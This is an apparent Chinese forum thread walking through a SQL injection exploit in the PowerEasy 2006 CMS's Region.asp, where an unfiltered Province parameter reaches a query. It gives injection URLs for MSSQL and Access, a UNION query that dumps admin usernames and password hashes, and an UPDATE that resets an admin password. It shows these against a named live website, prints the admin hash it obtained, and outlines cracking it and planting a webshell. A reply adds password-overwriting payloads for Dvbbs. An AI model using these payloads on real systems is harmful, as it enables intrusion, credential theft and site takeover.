服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务

dirtysea 发表于 2007-1-27 21:37:49

动易2006新漏洞利用入侵

<P>引用网安:<BR>在Region.asp中有以下漏洞</P>
<P><BR>Country = ReplaceBadChar(Trim(Request("Country")))<BR>Province = ReplaceBadChar(Trim(Request("Province")))<BR>City = ReplaceBadChar(Trim(Request("City")))</P>
<P>对所有传入的变量都进行了过滤,但是编程者在这里:</P>
<P>Set TempRs = Conn.Execute("SELECT Province FROM PE_Province WHERE Country='" &amp; Country &amp; "' ORDER BY ProvinceID")<BR>If Err Or TempRs.EOF Then<BR>ReDim ShowProvince(0, 0)<BR>Province = Trim(Request.QueryString("Province"))<BR>Else<BR>ShowProvince = TempRs.GetRows(-1)<BR>End If<BR>Set TempRs = Conn.Execute("SELECT DISTINCT City FROM PE_City WHERE Province='" &amp; Province &amp; "'")</P>
<P>大家可以看到,Province = Trim(Request.QueryString("Province")) 这里直接取的是传入的Province,而不是过滤后的,所以这个Province变量危险了,那么在下面他是直接带入了查询,由于Province变量是我们可以随意构造的,所以我们就可以构造我们的SQL语句。</P>
<P>但是要进入这个查询的前提是:Err=true 或者 TempRs.EOF,而要达到这2个中的一个,就是要让Conn.Execute("SELECT Province FROM PE_Province WHERE Country='" &amp; Country &amp; "' ORDER BY ProvinceID")这条语句在表中查询不到所要找的Country,这样就好构造了。下面是利用代码:</P>
<P>Region.asp?Country...tt&amp;Province=shi'+and+user&gt;0--</P>
<P>就是在</P>
<P>Region.asp?Country...tt&amp;Province=shi'后面加上我们的SQL注入语句。</P>
<P><BR>这就是整个利用原理,很简单,但也很致命的漏洞。</P>
<P><BR>上面是MSSQL版本的利用,而如果要是ACCESS版本中的利用,那么怎么办呢,呵呵,聪明的你可能觉得我在说废话老,看吧。</P>
<P>http://127.0.0.1/Region.asp?Country...tt&amp;Province=shi' and 1=1 and '1'='1</P>
<P>这样的话,我们的and 1=1就是在access版本中的利用。呵呵。这样就完成这个漏洞在2个版本的利用。</P>
<P>http://127.0.0.1/Region.asp?Country...tt&amp;Province=shi'+and+1=2+union+select+password+from+PE_Admin+where+1&lt;2+and+'1'='1</P>
<P><BR>其中username是要暴的字段,哈哈,通杀的感觉爽吧</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>补充:</P>
<P>update PE_Admin set Password='13955235245b2497' where id=2--</P>
<P>如果不可以列目录就插管理员,但我喜欢直接update管理员密码,拿完shell后改回来,或去加一个</P>
<P>如果可以列目录就直接找web目录,然后用nb的getwebshell就可以拿到webshell了</P>
<P>&nbsp;</P>
<P>下面我演示一下access版本的动易系统漏洞的利用,其实下面语句就是基本的注入语句。<BR>用这个站作演示:http://www.173yz.com</P>
<P>还是一个游戏网!<BR>(1):先暴所有管理员帐号。<BR>我们先在后面加入以后代码<BR>/Region.asp?Country=tt&amp;City=whytt&amp;Province=shi'+and+1=2+union+select+username+from+PE_Admin+where+1&lt;2+and+'1'='1<BR>先暴所有管理员帐号。<BR>管理员的密码出来了:admin<BR>(2)接下来我们先爆出管理员的密码</P>
<P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <BR>admin的密码: 7dc102e3a1309a39</P>
<P>这是MD5的你要以去www.md5.com去破解,然后去管理员页合登录后台,上传你的木马拿webshell<BR>这个步骤我就不多说了,相信大家多去学习一下!</P>
<P><BR>这样就可以精确的暴出相对应的用户和密码。admin (7dc102e3a1309a39)<BR>好了这个教程就到这!!!</P>

〓陈三太子〓 发表于 2006-5-18 07:28:57

re:动易2006新漏洞利用入侵

<P><FONT size=2>测试是否有漏洞。<BR>77169',0);update/**/Dv_User/**/set/**/UserEmail=username/**/where ='bbs77169com';--</FONT></P>
<P><FONT size=2>coolidea|||123',0);update/**/Dv_User/**/set/**/UserPassword='469e80d32c0559f8'/**/where='konbluesky';--</FONT></P>
<P><FONT size=2>请问下77169',0);和coolidea|||123',0); 怎么区别和什么有关</FONT></P>
页: [1]
查看完整版本: 动易2006新漏洞利用入侵